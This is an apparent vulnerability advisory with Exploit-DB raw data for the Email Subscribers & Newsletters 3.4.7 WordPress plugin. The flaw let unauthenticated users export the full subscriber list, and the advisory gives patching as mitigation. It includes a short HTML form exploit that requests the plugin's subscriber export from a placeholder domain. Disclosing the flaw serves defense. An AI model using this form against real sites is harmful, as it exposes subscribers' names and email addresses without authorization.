Vendor: Email Subscribers & Newsletters
By: ThreatPress Security
CVSS: 7.5 (HIGH)
Type: Information Disclosure
CWE: 200
Product Name: Email Subscribers & Newsletters
Affected Version From: 3.4.7
Affected Version To: 3.4.7
Patch Exists: YES
Related CWE: N/A
CPE: a:icegram:email_subscribers_&_newsletters
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: WordPress 4.9.2
2018

WordPress Plugin Email Subscribers & Newsletters 3.4.7 – Information Disclosure

Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed a vulnerability that allowed an unauthenticated user to download the entire subscriber list, including names and e-mail addresses.

Mitigation:

Update to the latest version of the plugin.

Exploit-DB raw data:

# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 3.4.7 - Information Disclosure
# Google Dork:
# Date: 2018-01-23
# Exploit Author: ThreatPress Security
# Vendor Homepage: http://icegram.com/
# Software Link: https://wordpress.org/plugins/email-subscribers/
# Version: 3.4.7
# Tested on: WordPress 4.9.2
# CVE :

Email Subscribers & Newsletters, a popular WordPress plugin, has just fixed
the vulnerability that allows an unauthenticated user to download the entire
subscriber list with names and e-mail addresses.

Exploit:

<form action="http://DOMAINTOTEST.com/?es=export" method="post">
    <input type="text" name="option" value="view_all_subscribers" />
    <input type="submit" value="Exploit" />
</form>